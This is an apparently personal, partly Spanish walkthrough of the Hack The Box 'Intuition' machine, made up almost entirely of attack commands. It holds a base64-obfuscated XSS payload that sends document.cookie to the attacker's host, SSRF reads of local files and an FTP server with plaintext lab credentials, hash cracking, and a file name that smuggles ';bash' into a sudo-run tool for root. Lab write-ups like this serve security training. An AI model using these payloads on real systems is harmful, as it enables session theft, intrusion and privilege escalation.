Cu3rv0x
Intuition

Intuition


HTB Linux

nmap -A -p- -oA intuition 10.10.11.15 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA intuition 10.10.11.15

ping -c 1 10.10.11.15

echo "10.10.11.15 comprezzor.htb auth.comprezzor.htb dashboard.comprezzor.htb report.comprezzor.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA intuition-udp 10.10.11.15

nmap -p- --open -T5 -v -n 10.10.11.15

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.11.15 -oG allPorts

ssh_command.

extractPorts allPorts

nmap -sCV -p80,22 10.10.11.15 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.10.11.15

ssh_command.

wfuzz -c --hc=302,404,403,400 -t 200 -w /usr/share/Seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://10.10.11.15/ -H "Host: FUZZ.comprezzor.htb"

ssh_command.

ssh_command.

<img src=x onerror='eval(atob("ZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC4zOjkwMDEvP2Nvb2tpZT0nK2RvY3VtZW50LmNvb2tpZSk="));' />

ssh_command.

nc -lvnp 9001

ssh_command.

Creamos otro tiquete

ssh_command.

python3 -m http.server 80

Nos dirigimos a http://dashboard.compozzer.htb

Le damos click a uno de los tiquetes que acabamos de hacer y le ponemos un prioridad alta dandole click a set high priority

ssh_command.

ssh_command.

http://dashboard.compozzer.htb/create_pdf_report

ssh_command.

file:///etc/passwd

ssh_command.

ssh_command.

file:///app/code/blueprints/dashboard/dashboard.py

ssh_command.

ftp://ftp_admin:u3jai8y71s2@ftp.local

ssh_command.

ssh_command.

ftp://ftp_admin:u3jai8y71s2@ftp.local/private-8297.key

ssh_command.

ssh_command.

ftp://ftp_admin:u3jai8y71s2@ftp.local/welcome_note.txt

ssh_command.

ssh_command.

chmod 400 id_rsa

ssh_command.

sudo ssh-keygen -p -f id_rsa

Y27SH19HDIWD

ssh_command.

ssh -i id_rsa dev_acc@10.10.11.15

ssh_command.

cat users.sql

ssh_command.

cat users.db

ssh_command.

sqlite3 users.db

Select * from users;

ssh_command.

hashcat -m 30210 hash /usr/share/wordlists/rockyou.txt --show

ssh_command.

ftp adam@localhost

ssh_command.

prompt off recurse on mget *

ssh_command.

cat run-tests.sh

ssh_command.

zgrep -i lopez ./*.gz

ssh_command.

Credenicales-> lopez:Lopezz1992%123

ssh lopez@10.10.11.15

sudo -l

sudo /opt/runner2/runner2

ssh_command.

echo '{"run": {"action":""list"}, "auth_code":"UHI75GHINKOP"}' > new.json

sudo /opt/runner2/runner2 new.json

ssh_command.

wget https://github.com/coopdevs/sys-admins-role/archive/v0.0.3.tar.gz

ssh_command.

python3 -m http.server 80

ssh_command.

wget http://10.10.14.3/v0.0.3.tar.gz

ssh_command.

cat new.json | jq

ssh_command.

mv v0.0.3.tar.gz admin.tar.gz\;bash

sudo /opt/runner2/runner2 new.json

ssh_command.

© 2024 Cu3rv0x